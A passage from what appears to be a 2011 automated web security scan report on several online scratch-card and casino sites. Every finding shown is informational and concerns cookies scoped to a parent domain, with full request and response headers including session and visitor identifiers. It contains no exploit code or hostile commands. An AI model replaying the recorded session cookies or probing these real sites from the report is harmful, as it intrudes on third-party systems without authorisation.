Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:25 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.43. http://home.okscratchcards.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.44. http://home.okscratchcards.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:28 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.45. http://home.okscratchcards.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.46. http://home.okscratchcards.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx?&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37519


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.47. http://home.okscratchcards.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.48. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.49. http://home.okscratchcards.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.50. http://home.okscratchcards.com/help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.51. http://home.okscratchcards.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /visit.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=20&LNG=~ENG& HTTP/1.1
Host: home.okscratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.okscratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=80613129.885970471.1305546061.1305546061.1305546061.1; __utmc=80613129; __utmb=80613129.1.10.1305546061

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=a4hnfa45jaet4yaah01vnr55; path=/; HttpOnly
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 11:41:04 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: UniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Vary: Accept-Encoding
Content-Length: 131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



11.52. http://it.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.53. http://it.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vfoiefqow3k4oyvyuuo5pp45; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.54. http://it.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qheiwe45dbfxdf55gz1vhzbv; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
